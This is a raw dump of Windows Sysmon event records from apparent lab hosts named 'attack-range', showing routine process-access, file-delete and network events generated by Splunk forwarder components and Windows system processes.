10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0FE7-6216-2C04-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE7-6216-2C04-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-0FE7-6216-2C04-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:52.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C107DAB16BEAC6689434D8D68B9AA78A,SHA256=B55614AA5D1F5824034F659ED77DAAC1AB554AB33BA13F7E51F0C0045A515BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:52.526{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A11723D598652EAB03D58389022BDBE3,SHA256=0608E7CAFA01A8928916202FA001DB07C82EFE8F8F78BDED1D1F8D446B6BA0CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:53.404{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C4D9170C6E0491009C45A949875E26A,SHA256=DA50915D697111E2A0F9B81783D487CAE1724AB8ECED2B645D9CD49E0E575897,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.699{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51258-false10.0.1.12-8000- 23542300x8000000000000000215487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:53.010{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCD26F1F6DEBF7A4D6A12CBB5992024,SHA256=F04A18C65B7889D3CA43DF135798850D6B427E64647949CD1E80F4AA155062F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:52.518{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:54.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F3BA6680F1E5D6DA09B1CFADD73DF09,SHA256=F24BD76525F296545B082C34D74EBCD8E2E6B73F58046BA226AF1C23B037F731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:54.244{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E95F8FC315F07A2A03D07402A526BEC,SHA256=FF6D7E5FDBC863275097B15BE18B7E87EE6D626A96314A481DD080E5E60EA4F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:55.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307775EF007372F08098BAB5E2917FF9,SHA256=43391C3E816D7E36BF53BF91634C6A0489CEE52CEE0EA389CDEFBC41874080C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:55.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B2BCA58C6927B756361B8CD91CF80E,SHA256=7DD8E90AA33C99AD762A972D2BD5FB229E034DFD5A585A36A22476A4B7FE7379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:56.529{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F3698733C48B3DCAB2471505E821BDC,SHA256=DE4C9D1B8ED616AD8B631C65C49A66281F227F6991374F31AF9F2AC5D830C640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:56.447{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FE864D9EB99DA43DD934E1687D4C6F,SHA256=C34AA15D0E35D1AB3A213C067D45184F6E9B0D9AE05A9C1AE63B70CBA309855A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:57.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E36DA6E460C7D5F7AD3FBB2D17C611DB,SHA256=3D92B80EAFAB1B970DB6B03C5FC45ABC048ADAA0E5E218AA409DE1A044FB631A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:57.447{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=897D58DD67C26BBAC7D95638533CE27C,SHA256=39A181361BA63E8855CA2806EE6495DCE80F8E5D0D02B91E3CD82BEC59F54F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:58.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21ADDE1A3FAE441FE6A3C1E41FDEFD8E,SHA256=9637F699B3FC17C027B3804C2CFEC758F1FC1E9798450974A3E8C8F58DBCB925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:58.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86BE0A0CDB9DB72B5002F5CF2540128B,SHA256=D4518BBA19A11F8F78AF17C8BCB84CCE43C1AD55F4EB1C5E4F36B243D0BEA865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:59.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BF4B059B871456A62804E9442C2D9BD,SHA256=496637BD3DED0EFB81DA6A7A31501649AD7DEE514539612EEE8917E0C47940F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:59.572{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5142F7B05D3FB4C867CAE904BB10C1AA,SHA256=365724D1DBB3681E327AE210DEB9416B198A0DDD0E84059BBD2A97F707580AD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:56.605{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51259-false10.0.1.12-8000- 23542300x8000000000000000215496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:00.619{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F681A7EAB7D60A5BADD1E2C63190DDD1,SHA256=2BF2662EE6385D8225B7B9EEF1B57DA48640090384A14595AB8FE2F01D0FD040,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:57.675{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53342-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:00.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F1AB352A2CAA4676D92FFBEDAD3D72,SHA256=6591FAC10C4666F6A3EA1175F414B4D1891686FC14BDF7AA88456A45ABE1307F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:01.775{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2310EABAF2BA66356DA95D4656054A2A,SHA256=4408FF5A0320B17BFA629408156FE7AB8B4651723E64A30497F658B6DC3B0ECA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FF1-6216-DA04-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B58A845BD3A8AA4E28AC92D6175C9A69,SHA256=205743F4BA3A0C8D2D7DAB22FBB6A038874BD50296D84FE4935D005ABD96F5E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0FF1-6216-DA04-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.763{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FF1-6216-DA04-000000003802}5308C:\Program 